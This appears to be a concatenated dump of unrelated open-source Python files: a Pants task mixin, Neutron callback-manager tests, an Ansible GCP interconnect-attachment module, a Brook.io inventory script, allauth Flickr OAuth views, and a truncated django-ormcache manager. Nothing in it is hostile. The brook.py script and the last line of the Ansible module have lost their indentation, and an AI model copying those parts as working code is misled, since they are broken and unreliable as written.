from pants.backend.core.tasks.task import Task
from pants.base.exceptions import TaskError
class TargetFilterTaskMixin(Task):
  """A Task mixin that provides methods to help with filtering by target type."""

  class InvalidTargetType(TaskError):
    """Indicates a target type name that is not registered or does not point to a `Target` type."""

  def target_types_for_alias(self, alias):
    """Returns all the target types that might be produced by the given alias.

    Normally there is 1 target type per alias, but macros can expand a single alias to several
    target types.

    :param string alias: The alias to look up associated target types for.
    :returns: The set of target types that can be produced by the given alias.
    :raises :class:`TargetFilterTaskMixin.InvalidTargetType`: when no target types correspond to
                                                             the given `alias`.
    """
    aliases = self.context.build_file_parser.registered_aliases()
    matched_types = aliases.target_types_by_alias.get(alias, None)
    if matched_types:
      return matched_types
    raise self.InvalidTargetType('Not a target type: {}'.format(alias))
|
apache-2.0
|
bigswitch/neutron
|
neutron/tests/unit/callbacks/test_manager.py
|
5
|
8124
|
# Copyright 2015 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from neutron.callbacks import events
from neutron.callbacks import exceptions
from neutron.callbacks import manager
from neutron.callbacks import resources
from neutron.tests import base
def callback_1(*args, **kwargs):
    """Test callback that counts its own invocations on the function object."""
    callback_1.counter = callback_1.counter + 1
callback_id_1 = manager._get_id(callback_1)


def callback_2(*args, **kwargs):
    """Second counting callback, independent of callback_1."""
    callback_2.counter = callback_2.counter + 1
callback_id_2 = manager._get_id(callback_2)


def callback_raise(*args, **kwargs):
    """Callback that always fails, for exercising error paths."""
    raise Exception()
class CallBacksManagerTestCase(base.BaseTestCase):
    """Unit tests for manager.CallbacksManager.

    Assertions inspect the manager's internal registries: ``_callbacks``
    (resource -> event -> subscribed callbacks) and ``_index``
    (callback id -> resource mapping), as well as notify behavior.
    """

    def setUp(self):
        super(CallBacksManagerTestCase, self).setUp()
        self.manager = manager.CallbacksManager()
        # Counters live on the module-level callback functions and are
        # shared across tests; reset them so each test starts from zero.
        callback_1.counter = 0
        callback_2.counter = 0

    def test_subscribe(self):
        self.manager.subscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.assertIsNotNone(
            self.manager._callbacks[resources.PORT][events.BEFORE_CREATE])
        self.assertIn(callback_id_1, self.manager._index)

    def test_subscribe_unknown(self):
        # Arbitrary resource/event names are accepted, not only the
        # predefined constants.
        self.manager.subscribe(
            callback_1, 'my_resource', 'my-event')
        self.assertIsNotNone(
            self.manager._callbacks['my_resource']['my-event'])
        self.assertIn(callback_id_1, self.manager._index)

    def test_subscribe_is_idempotent(self):
        # Subscribing the same callback twice registers it only once.
        self.manager.subscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.manager.subscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.assertEqual(
            1,
            len(self.manager._callbacks[resources.PORT][events.BEFORE_CREATE]))
        callbacks = self.manager._index[callback_id_1][resources.PORT]
        self.assertEqual(1, len(callbacks))

    def test_subscribe_multiple_callbacks(self):
        self.manager.subscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.manager.subscribe(
            callback_2, resources.PORT, events.BEFORE_CREATE)
        self.assertEqual(2, len(self.manager._index))
        self.assertEqual(
            2,
            len(self.manager._callbacks[resources.PORT][events.BEFORE_CREATE]))

    def test_unsubscribe(self):
        self.manager.subscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.manager.unsubscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.assertNotIn(
            callback_id_1,
            self.manager._callbacks[resources.PORT][events.BEFORE_CREATE])
        self.assertNotIn(callback_id_1, self.manager._index)

    def test_unsubscribe_unknown_callback(self):
        # Unsubscribing a never-registered callback is a no-op and must
        # not disturb other subscriptions.
        self.manager.subscribe(
            callback_2, resources.PORT, events.BEFORE_CREATE)
        self.manager.unsubscribe(callback_1, mock.ANY, mock.ANY)
        self.assertEqual(1, len(self.manager._index))

    def test_unsubscribe_is_idempotent(self):
        self.manager.subscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.manager.unsubscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.manager.unsubscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.assertNotIn(callback_id_1, self.manager._index)
        self.assertNotIn(callback_id_1,
            self.manager._callbacks[resources.PORT][events.BEFORE_CREATE])

    def test_unsubscribe_by_resource(self):
        self.manager.subscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.manager.subscribe(
            callback_1, resources.PORT, events.BEFORE_DELETE)
        self.manager.subscribe(
            callback_2, resources.PORT, events.BEFORE_DELETE)
        self.manager.unsubscribe_by_resource(callback_1, resources.PORT)
        self.assertNotIn(
            callback_id_1,
            self.manager._callbacks[resources.PORT][events.BEFORE_CREATE])
        # callback_2 on the same resource must be unaffected.
        self.assertIn(
            callback_id_2,
            self.manager._callbacks[resources.PORT][events.BEFORE_DELETE])
        self.assertNotIn(callback_id_1, self.manager._index)

    def test_unsubscribe_all(self):
        self.manager.subscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.manager.subscribe(
            callback_1, resources.PORT, events.BEFORE_DELETE)
        self.manager.subscribe(
            callback_1, resources.ROUTER, events.BEFORE_CREATE)
        self.manager.unsubscribe_all(callback_1)
        self.assertNotIn(
            callback_id_1,
            self.manager._callbacks[resources.PORT][events.BEFORE_CREATE])
        self.assertNotIn(callback_id_1, self.manager._index)

    def test_notify_none(self):
        # Notifying with no subscribers must not invoke any callback.
        self.manager.notify(resources.PORT, events.BEFORE_CREATE, mock.ANY)
        self.assertEqual(0, callback_1.counter)
        self.assertEqual(0, callback_2.counter)

    def test_feebly_referenced_callback(self):
        # A lambda with no other strong reference; notify must not crash
        # after the subscriber may have been garbage collected.
        self.manager.subscribe(lambda *x, **y: None, resources.PORT,
                               events.BEFORE_CREATE)
        self.manager.notify(resources.PORT, events.BEFORE_CREATE, mock.ANY)

    def test_notify_with_exception(self):
        with mock.patch.object(self.manager, '_notify_loop') as n:
            n.return_value = ['error']
            self.assertRaises(exceptions.CallbackFailure,
                              self.manager.notify,
                              mock.ANY, events.BEFORE_CREATE,
                              'trigger', params={'a': 1})
            # On failure the manager fires the matching abort event too.
            expected_calls = [
                mock.call(mock.ANY, 'before_create',
                          'trigger', params={'a': 1}),
                mock.call(mock.ANY, 'abort_create',
                          'trigger', params={'a': 1})
            ]
            n.assert_has_calls(expected_calls)

    def test_notify_handle_exception(self):
        self.manager.subscribe(
            callback_raise, resources.PORT, events.BEFORE_CREATE)
        e = self.assertRaises(exceptions.CallbackFailure, self.manager.notify,
                              resources.PORT, events.BEFORE_CREATE, self)
        # The raising callback's error is wrapped as a NotificationError.
        self.assertIsInstance(e.errors[0], exceptions.NotificationError)

    def test_notify_called_once_with_no_failures(self):
        with mock.patch.object(self.manager, '_notify_loop') as n:
            n.return_value = False
            self.manager.notify(resources.PORT, events.BEFORE_CREATE, mock.ANY)
            n.assert_called_once_with(
                resources.PORT, events.BEFORE_CREATE, mock.ANY)

    def test__notify_loop_single_event(self):
        self.manager.subscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.manager.subscribe(
            callback_2, resources.PORT, events.BEFORE_CREATE)
        self.manager._notify_loop(
            resources.PORT, events.BEFORE_CREATE, mock.ANY)
        self.assertEqual(1, callback_1.counter)
        self.assertEqual(1, callback_2.counter)

    def test__notify_loop_multiple_events(self):
        self.manager.subscribe(
            callback_1, resources.PORT, events.BEFORE_CREATE)
        self.manager.subscribe(
            callback_1, resources.ROUTER, events.BEFORE_DELETE)
        self.manager.subscribe(
            callback_2, resources.PORT, events.BEFORE_CREATE)
        self.manager._notify_loop(
            resources.PORT, events.BEFORE_CREATE, mock.ANY)
        self.manager._notify_loop(
            resources.ROUTER, events.BEFORE_DELETE, mock.ANY)
        # callback_1 fired for both loops; callback_2 only for the first.
        self.assertEqual(2, callback_1.counter)
        self.assertEqual(1, callback_2.counter)
|
apache-2.0
|
valentin-krasontovitsch/ansible
|
lib/ansible/modules/cloud/google/gcp_compute_interconnect_attachment.py
|
1
|
15372
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_compute_interconnect_attachment
description:
- Represents an InterconnectAttachment (VLAN attachment) resource. For more information,
see Creating VLAN Attachments.
short_description: Creates a GCP InterconnectAttachment
version_added: 2.8
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices:
- present
- absent
default: present
interconnect:
description:
- URL of the underlying Interconnect object that this attachment's traffic will
traverse through.
required: true
description:
description:
- An optional description of this resource.
required: false
router:
description:
- URL of the cloud router to be used for dynamic routing. This router must be
in the same region as this InterconnectAttachment. The InterconnectAttachment
will automatically connect the Interconnect to the network & region within which
the Cloud Router is configured.
- 'This field represents a link to a Router resource in GCP. It can be specified
in two ways. First, you can place in the selfLink of the resource here as a
string Alternatively, you can add `register: name-of-resource` to a gcp_compute_router
task and then set this router field to "{{ name-of-resource }}"'
required: true
name:
description:
- Name of the resource. Provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
required: true
candidate_subnets:
description:
- Up to 16 candidate prefixes that can be used to restrict the allocation of cloudRouterIpAddress
and customerRouterIpAddress for this attachment.
- All prefixes must be within link-local address space (169.254.0.0/16) and must
be /29 or shorter (/28, /27, etc). Google will attempt to select an unused /29
from the supplied candidate prefix(es). The request will fail if all possible
/29s are in use on Google's edge. If not supplied, Google will randomly select
an unused /29 from all of link-local space.
required: false
vlan_tag8021q:
description:
- The IEEE 802.1Q VLAN tag for this attachment, in the range 2-4094.
required: false
region:
description:
- Region where the regional interconnect attachment resides.
required: true
extends_documentation_fragment: gcp
'''
EXAMPLES = '''
- name: create a interconnect attachment
gcp_compute_interconnect_attachment:
name: "test_object"
region: us-central1
project: "test_project"
auth_kind: "serviceaccount"
interconnect: https://googleapis.com/compute/v1/projects/test_project/global/interconnects/...
router: https://googleapis.com/compute/v1/projects/test_project/regions/us-central1/routers/...
service_account_file: "/tmp/auth.pem"
state: present
register: disk
'''
RETURN = '''
cloudRouterIpAddress:
description:
- IPv4 address + prefix length to be configured on Cloud Router Interface for this
interconnect attachment.
returned: success
type: str
customerRouterIpAddress:
description:
- IPv4 address + prefix length to be configured on the customer router subinterface
for this interconnect attachment.
returned: success
type: str
interconnect:
description:
- URL of the underlying Interconnect object that this attachment's traffic will
traverse through.
returned: success
type: str
description:
description:
- An optional description of this resource.
returned: success
type: str
privateInterconnectInfo:
description:
- Information specific to an InterconnectAttachment. This property is populated
if the interconnect that this is attached to is of type DEDICATED.
returned: success
type: complex
contains:
tag8021q:
description:
- 802.1q encapsulation tag to be used for traffic between Google and the customer,
going to and from this network and region.
returned: success
type: int
googleReferenceId:
description:
- Google reference ID, to be used when raising support tickets with Google or otherwise
to debug backend connectivity issues.
returned: success
type: str
router:
description:
- URL of the cloud router to be used for dynamic routing. This router must be in
the same region as this InterconnectAttachment. The InterconnectAttachment will
automatically connect the Interconnect to the network & region within which the
Cloud Router is configured.
returned: success
type: str
creationTimestamp:
description:
- Creation timestamp in RFC3339 text format.
returned: success
type: str
id:
description:
- The unique identifier for the resource. This identifier is defined by the server.
returned: success
type: str
name:
description:
- Name of the resource. Provided by the client when the resource is created. The
name must be 1-63 characters long, and comply with RFC1035. Specifically, the
name must be 1-63 characters long and match the regular expression `[a-z]([-a-z0-9]*[a-z0-9])?`
which means the first character must be a lowercase letter, and all following
characters must be a dash, lowercase letter, or digit, except the last character,
which cannot be a dash.
returned: success
type: str
candidateSubnets:
description:
- Up to 16 candidate prefixes that can be used to restrict the allocation of cloudRouterIpAddress
and customerRouterIpAddress for this attachment.
- All prefixes must be within link-local address space (169.254.0.0/16) and must
be /29 or shorter (/28, /27, etc). Google will attempt to select an unused /29
from the supplied candidate prefix(es). The request will fail if all possible
/29s are in use on Google's edge. If not supplied, Google will randomly select
an unused /29 from all of link-local space.
returned: success
type: list
vlanTag8021q:
description:
- The IEEE 802.1Q VLAN tag for this attachment, in the range 2-4094.
returned: success
type: int
region:
description:
- Region where the regional interconnect attachment resides.
returned: success
type: str
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, remove_nones_from_dict, replace_resource_dict
import json
import re
import time
################################################################################
# Main
################################################################################
def main():
    """Entry point: reconcile declared InterconnectAttachment state with GCP."""
    module = GcpModule(
        argument_spec=dict(
            state=dict(default='present', choices=['present', 'absent'], type='str'),
            interconnect=dict(required=True, type='str'),
            description=dict(type='str'),
            router=dict(required=True),
            name=dict(required=True, type='str'),
            candidate_subnets=dict(type='list', elements='str'),
            vlan_tag8021q=dict(type='int'),
            region=dict(required=True, type='str'),
        )
    )

    # Default to the compute scope when the caller did not supply one.
    if not module.params['scopes']:
        module.params['scopes'] = ['https://www.googleapis.com/auth/compute']

    desired_state = module.params['state']
    kind = 'compute#interconnectAttachment'

    fetch = fetch_resource(module, self_link(module), kind)
    changed = False

    if fetch:
        # Resource exists remotely: update (re-fetch) or delete as requested.
        if desired_state == 'present':
            if is_different(module, fetch):
                update(module, self_link(module), kind)
                fetch = fetch_resource(module, self_link(module), kind)
                changed = True
        else:
            delete(module, self_link(module), kind)
            fetch = {}
            changed = True
    elif desired_state == 'present':
        # Resource missing: create it.
        fetch = create(module, collection(module), kind)
        changed = True
    else:
        fetch = {}

    fetch.update({'changed': changed})

    module.exit_json(**fetch)
def create(module, link, kind):
    """POST the resource and block until the resulting operation completes."""
    session = GcpSession(module, 'compute')
    return wait_for_operation(module, session.post(link, resource_to_request(module)))
def update(module, link, kind):
    # The API offers no edit operation for InterconnectAttachments, so any
    # detected difference between params and the live resource is a hard
    # failure (see main()).
    module.fail_json(msg="InterconnectAttachment cannot be edited")
def delete(module, link, kind):
    """DELETE the resource and block until the resulting operation completes."""
    session = GcpSession(module, 'compute')
    return wait_for_operation(module, session.delete(link))
def resource_to_request(module):
    """Build the API request body from module params.

    Empty/None values are dropped; explicit False is kept so boolean
    params survive the filtering.
    """
    request = {
        u'kind': 'compute#interconnectAttachment',
        u'interconnect': module.params.get('interconnect'),
        u'description': module.params.get('description'),
        u'router': replace_resource_dict(module.params.get(u'router', {}), 'selfLink'),
        u'name': module.params.get('name'),
        u'candidateSubnets': module.params.get('candidate_subnets'),
        u'vlanTag8021q': module.params.get('vlan_tag8021q'),
    }
    return {key: value for key, value in request.items()
            if value or value is False}
def fetch_resource(module, link, kind, allow_not_found=True):
    """GET the resource at `link`; returns None on 404 when allowed."""
    session = GcpSession(module, 'compute')
    return return_if_object(module, session.get(link), kind, allow_not_found)
def self_link(module):
    """URL identifying this specific interconnect attachment."""
    template = ("https://www.googleapis.com/compute/v1/projects/{project}"
                "/regions/{region}/interconnectAttachments/{name}")
    return template.format(**module.params)
def collection(module):
    """URL of the regional interconnectAttachments collection."""
    template = ("https://www.googleapis.com/compute/v1/projects/{project}"
                "/regions/{region}/interconnectAttachments")
    return template.format(**module.params)
def return_if_object(module, response, kind, allow_not_found=False):
    """Decode an API response into a dict, or None for 404/204.

    Fails the module on HTTP errors, undecodable JSON, or an error payload.
    """
    # Tolerated absence: callers treat None as "resource does not exist".
    if allow_not_found and response.status_code == 404:
        return None

    # No content to decode.
    if response.status_code == 204:
        return None

    try:
        module.raise_for_status(response)
        result = response.json()
    except getattr(json.decoder, 'JSONDecodeError', ValueError):
        module.fail_json(msg="Invalid JSON response with error: %s" % response.text)

    payload_errors = navigate_hash(result, ['error', 'errors'])
    if payload_errors:
        module.fail_json(msg=payload_errors)

    return result
def is_different(module, response):
    """Return True when declared params differ from the live resource.

    Only keys present on both sides are compared, since the API returns
    output-only fields the module never sets.
    """
    request = resource_to_request(module)
    remote = response_to_hash(module, response)

    remote_shared = {k: v for k, v in remote.items() if k in request}
    request_shared = {k: v for k, v in request.items() if k in remote}

    return GcpRequest(request_shared) != GcpRequest(remote_shared)
# Remove unnecessary properties from the response.
# This is for doing comparisons with Ansible's current parameters.
def response_to_hash(module, response):
    """Normalize an API response to the fields this module knows about.

    Output-only fields are included here and filtered later by
    is_different(), which compares only keys shared with the request.
    """
    return {
        u'cloudRouterIpAddress': response.get(u'cloudRouterIpAddress'),
        u'customerRouterIpAddress': response.get(u'customerRouterIpAddress'),
        u'interconnect': response.get(u'interconnect'),
        u'description': response.get(u'description'),
        u'privateInterconnectInfo': InterconnectAttachmentPrivateinterconnectinfo(response.get(u'privateInterconnectInfo', {}), module).from_response(),
        u'googleReferenceId': response.get(u'googleReferenceId'),
        u'router': response.get(u'router'),
        u'creationTimestamp': response.get(u'creationTimestamp'),
        u'id': response.get(u'id'),
        u'name': response.get(u'name'),
        u'candidateSubnets': response.get(u'candidateSubnets'),
        u'vlanTag8021q': response.get(u'vlanTag8021q'),
    }
def region_selflink(name, params):
    """Expand a bare region name into its full compute API self link.

    Returns None for None input, and leaves already-qualified region
    URLs untouched.
    """
    if name is None:
        return None
    qualified = r"https://www.googleapis.com/compute/v1/projects/.*/regions/[a-z1-9\-]*"
    if re.match(qualified, name):
        return name
    prefix = "https://www.googleapis.com/compute/v1/projects/{project}/regions/%s".format(**params)
    return prefix % name
def async_op_url(module, extra_data=None):
    """URL for polling a regional operation.

    `extra_data` supplies substitutions (e.g. op_id) not present in
    module.params; module.params wins on key collisions.
    """
    template = ("https://www.googleapis.com/compute/v1/projects/{project}"
                "/regions/{region}/operations/{op_id}")
    substitutions = dict(extra_data or {})
    substitutions.update(module.params)
    return template.format(**substitutions)
def wait_for_operation(module, response):
    """Resolve an async compute operation into the final resource."""
    op_result = return_if_object(module, response, 'compute#operation')
    if op_result is None:
        return {}
    status = navigate_hash(op_result, ['status'])
    completed = wait_for_completion(status, op_result, module)
    # The finished operation points at the resource it produced.
    return fetch_resource(module, navigate_hash(completed, ['targetLink']),
                          'compute#interconnectAttachment')
def wait_for_completion(status, op_result, module):
    """Poll a compute operation until its status reaches DONE.

    Fails the module if the operation payload carries errors; otherwise
    sleeps one second between polls and returns the final operation dict.
    """
    op_id = navigate_hash(op_result, ['name'])
    op_uri = async_op_url(module, {'op_id': op_id})
    while status != 'DONE':
        # Surface any operation errors before sleeping again.
        raise_if_errors(op_result, ['error', 'errors'], module)
        time.sleep(1.0)
        op_result = fetch_resource(module, op_uri, 'compute#operation')
        status = navigate_hash(op_result, ['status'])
    return op_result
def raise_if_errors(response, err_path, module):
    """Fail the module when the payload carries errors at `err_path`."""
    found = navigate_hash(response, err_path)
    if found is not None:
        module.fail_json(msg=found)
class InterconnectAttachmentPrivateinterconnectinfo(object):
    """(De)serializes the privateInterconnectInfo sub-object."""

    def __init__(self, request, module):
        self.module = module
        # Normalize falsy input to an empty dict so .get() is always safe.
        self.request = request or {}

    def to_request(self):
        """Request-side representation, with empty values removed."""
        return remove_nones_from_dict({u'tag8021q': self.request.get('tag8021q')})

    def from_response(self):
        """Response-side representation, with empty values removed."""
        return remove_nones_from_dict({u'tag8021q': self.request.get(u'tag8021q')})
if __name__ == '__main__':
main()
|
gpl-3.0
|
alexlo03/ansible
|
contrib/inventory/brook.py
|
27
|
9611
|
#!/usr/bin/env python
# Copyright 2016 Doalitic.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
"""
Brook.io external inventory script
==================================
Generates inventory that Ansible can understand by making API requests to Brook.io via the libbrook
library. Hence, such dependency must be installed in the system to run this script.
The default configuration file is named 'brook.ini' and is located alongside this script. You can
choose any other file by setting the BROOK_INI_PATH environment variable.
If param 'project_id' is left blank in 'brook.ini', the inventory includes all the instances in
projects where the requesting user belongs. Otherwise, only instances from the given project are
included, provided the requesting user belongs to it.
The following variables are established for every host. They can be retrieved from the hostvars
dictionary.
- brook_pid: str
- brook_name: str
- brook_description: str
- brook_project: str
- brook_template: str
- brook_region: str
- brook_zone: str
- brook_status: str
- brook_tags: list(str)
- brook_internal_ips: list(str)
- brook_external_ips: list(str)
- brook_created_at
- brook_updated_at
- ansible_ssh_host
Instances are grouped by the following categories:
- tag:
A group is created for each tag. E.g. groups 'tag_foo' and 'tag_bar' are created if there exist
instances with tags 'foo' and/or 'bar'.
- project:
A group is created for each project. E.g. group 'project_test' is created if a project named
'test' exist.
- status:
A group is created for each instance state. E.g. groups 'status_RUNNING' and 'status_PENDING'
are created if there are instances in running and pending state.
Examples:
Execute uname on all instances in project 'test'
$ ansible -i brook.py project_test -m shell -a "/bin/uname -a"
Install nginx on all debian web servers tagged with 'www'
$ ansible -i brook.py tag_www -m apt -a "name=nginx state=present"
Run site.yml playbook on web servers
$ ansible-playbook -i brook.py site.yml -l tag_www
Support:
This script is tested on Python 2.7 and 3.4. It may work on other versions though.
Author: Francisco Ros <[email protected]>
Version: 0.2
"""
import sys
import os
try:
from ConfigParser import SafeConfigParser as ConfigParser
except ImportError:
from configparser import ConfigParser
import json
try:
import libbrook
except:
sys.exit('Brook.io inventory script requires libbrook. See https://github.com/doalitic/libbrook')
class BrookInventory:
_API_ENDPOINT = 'https://api.brook.io'
def __init__(self):
    # Load api_token/project_id from brook.ini, authenticate against the
    # Brook.io API, then build the Ansible inventory structure.
    self._configure_from_file()
    self.client = self.get_api_client()
    self.inventory = self.get_inventory()
def _configure_from_file(self):
"""Initialize from .ini file.
Configuration file is assumed to be named 'brook.ini' and to be located on the same
directory than this file, unless the environment variable BROOK_INI_PATH says otherwise.
"""
brook_ini_default_path = \
os.path.join(os.path.dirname(os.path.realpath(__file__)), 'brook.ini')
brook_ini_path = os.environ.get('BROOK_INI_PATH', brook_ini_default_path)
config = ConfigParser(defaults={
'api_token': '',
'project_id': ''
})
config.read(brook_ini_path)
self.api_token = config.get('brook', 'api_token')
self.project_id = config.get('brook', 'project_id')
if not self.api_token:
sys.exit('You must provide (at least) your Brook.io API token to generate the dynamic '
'inventory.')
def get_api_client(self):
"""Authenticate user via the provided credentials and return the corresponding API client.
"""
# Get JWT token from API token
#
unauthenticated_client = libbrook.ApiClient(host=self._API_ENDPOINT)
auth_api = libbrook.AuthApi(unauthenticated_client)
api_token = libbrook.AuthTokenRequest()
api_token.token = self.api_token
jwt = auth_api.auth_token(token=api_token)
# Create authenticated API client
#
return libbrook.ApiClient(host=self._API_ENDPOINT,
header_name='Authorization',
header_value='Bearer %s' % jwt.token)
def get_inventory(self):
"""Generate Ansible inventory.
"""
groups = dict()
meta = dict()
meta['hostvars'] = dict()
instances_api = libbrook.InstancesApi(self.client)
projects_api = libbrook.ProjectsApi(self.client)
templates_api = libbrook.TemplatesApi(self.client)
# If no project is given, get all projects the requesting user has access to
#
if not self.project_id:
projects = [project.id for project in projects_api.index_projects()]
else:
projects = [self.project_id]
# Build inventory from instances in all projects
#
for project_id in projects:
project = projects_api.show_project(project_id=project_id)
for instance in instances_api.index_instances(project_id=project_id):
# Get template used for this instance if known
template = templates_api.show_template(template_id=instance.template) if instance.template else None
# Update hostvars
try:
meta['hostvars'][instance.name] = \
self.hostvars(project, instance, template, instances_api)
except libbrook.rest.ApiException:
continue
# Group by project
project_group = 'project_%s' % project.name
if project_group in groups:
groups[project_group].append(instance.name)
else:
groups[project_group] = [instance.name]
# Group by status
status_group = 'status_%s' % meta['hostvars'][instance.name]['brook_status']
if status_group in groups:
groups[status_group].append(instance.name)
else:
groups[status_group] = [instance.name]
# Group by tags
tags = meta['hostvars'][instance.name]['brook_tags']
for tag in tags:
tag_group = 'tag_%s' % tag
if tag_group in groups:
groups[tag_group].append(instance.name)
else:
groups[tag_group] = [instance.name]
groups['_meta'] = meta
return groups
def hostvars(self, project, instance, template, api):
"""Return the hostvars dictionary for the given instance.
Raise libbrook.rest.ApiException if it cannot retrieve all required information from the
Brook.io API.
"""
hostvars = instance.to_dict()
hostvars['brook_pid'] = hostvars.pop('pid')
hostvars['brook_name'] = hostvars.pop('name')
hostvars['brook_description'] = hostvars.pop('description')
hostvars['brook_project'] = hostvars.pop('project')
hostvars['brook_template'] = hostvars.pop('template')
hostvars['brook_region'] = hostvars.pop('region')
hostvars['brook_zone'] = hostvars.pop('zone')
hostvars['brook_created_at'] = hostvars.pop('created_at')
hostvars['brook_updated_at'] = hostvars.pop('updated_at')
del hostvars['id']
del hostvars['key']
del hostvars['provider']
del hostvars['image']
# Substitute identifiers for names
#
hostvars['brook_project'] = project.name
hostvars['brook_template'] = template.name if template else None
# Retrieve instance state
#
status = api.status_instance(project_id=project.id, instance_id=instance.id)
hostvars.update({'brook_status': status.state})
# Retrieve instance tags
#
tags = api.instance_tags(project_id=project.id, instance_id=instance.id)
hostvars.update({'brook_tags': tags})
# Retrieve instance addresses
#
addresses = api.instance_addresses(project_id=project.id, instance_id=instance.id)
internal_ips = [address.address for address in addresses if address.scope == 'internal']
external_ips = [address.address for address in addresses
if address.address and address.scope == 'external']
hostvars.update({'brook_internal_ips': internal_ips})
hostvars.update({'brook_external_ips': external_ips})
try:
hostvars.update({'ansible_ssh_host': external_ips[0]})
except IndexError:
raise libbrook.rest.ApiException(status='502', reason='Instance without public IP')
return hostvars
# Run the script
#
# Ansible executes this file directly and reads the inventory as JSON from
# stdout, so build it and print it unconditionally.
brook = BrookInventory()
print(json.dumps(brook.inventory))
|
gpl-3.0
|
kingofsystem/django-allauth
|
allauth/socialaccount/providers/flickr/views.py
|
65
|
1666
|
import json
from django.utils.http import urlencode
from allauth.socialaccount.providers.oauth.client import OAuth
from allauth.socialaccount.providers.oauth.views import (
OAuthAdapter,
OAuthLoginView,
OAuthCallbackView)
from .provider import FlickrProvider
class FlickrAPI(OAuth):
    """Thin OAuth client for the Flickr REST endpoint."""

    api_url = 'https://api.flickr.com/services/rest'

    def get_user_info(self):
        # Every call wants plain JSON back (no JSONP wrapper).
        json_params = {'nojsoncallback': '1',
                       'format': 'json'}

        def call(method, **extra):
            # Build the query with `method` first, then any extra
            # arguments, then the shared JSON parameters.
            params = dict({'method': method}, **extra)
            params.update(json_params)
            return json.loads(self.query(self.api_url + '?' + urlencode(params)))

        # First resolve the authenticated user's id, then fetch the
        # full profile for that id.
        login = call('flickr.test.login')
        return call('flickr.people.getInfo', user_id=login['user']['id'])
class FlickrOAuthAdapter(OAuthAdapter):
    """allauth OAuth1 adapter for Flickr."""

    provider_id = FlickrProvider.id
    request_token_url = 'http://www.flickr.com/services/oauth/request_token'
    access_token_url = 'http://www.flickr.com/services/oauth/access_token'
    authorize_url = 'http://www.flickr.com/services/oauth/authorize'

    def complete_login(self, request, app, token, response):
        # Fetch the Flickr profile with the app credentials and hand the
        # raw payload to the provider for normalization.
        api = FlickrAPI(request, app.client_id, app.secret,
                        self.request_token_url)
        profile = api.get_user_info()
        return self.get_provider().sociallogin_from_response(request, profile)
# Module-level view callables wired into allauth's generic OAuth flow.
oauth_login = OAuthLoginView.adapter_view(FlickrOAuthAdapter)
oauth_callback = OAuthCallbackView.adapter_view(FlickrOAuthAdapter)
|
mit
|
educreations/django-ormcache
|
ormcache/managers.py
|
1
|
2096
|
from django.db.models.signals import class_prepared, post_delete, post_save
from django.utils.functional import cached_property
from ormcache.queryset import CachedQuerySet
class CachedManagerMixin(object):
    """Manager mixin that routes queries through CachedQuerySet for models
    that opt in by setting a truthy ``cache_enabled`` class attribute.
    """

    @cached_property
    def __cache_enabled(self):
        # Opt-in flag, read once per manager instance from the model class.
        return getattr(self.model, "cache_enabled", False)

    def __require_cache(func):
        # Decorator (evaluated inside the class body, so `func` is the raw
        # function): guard cache-only API methods so they fail loudly when
        # caching is not enabled on the model.
        def wrapper(self, *args, **kwargs):
            if not self.__cache_enabled:
                error = "Caching is not enabled on {}".format(str(type(self)))
                raise RuntimeError(error)
            return func(self, *args, **kwargs)
        return wrapper

    @__require_cache
    def from_ids(self, ids, lookup='pk__in', **kwargs):
        # Delegate to CachedQuerySet.from_ids (cache-aware bulk fetch).
        queryset = self.get_queryset()
        return queryset.from_ids(ids, lookup=lookup, **kwargs)

    @__require_cache
    def invalidate(self, *args, **kwargs):
        return self.get_queryset().invalidate(*args, **kwargs)

    @__require_cache
    def cache_key(self, *args, **kwargs):
        return self.get_queryset().cache_key(*args, **kwargs)

    # Django overrides

    def contribute_to_class(self, model, name):
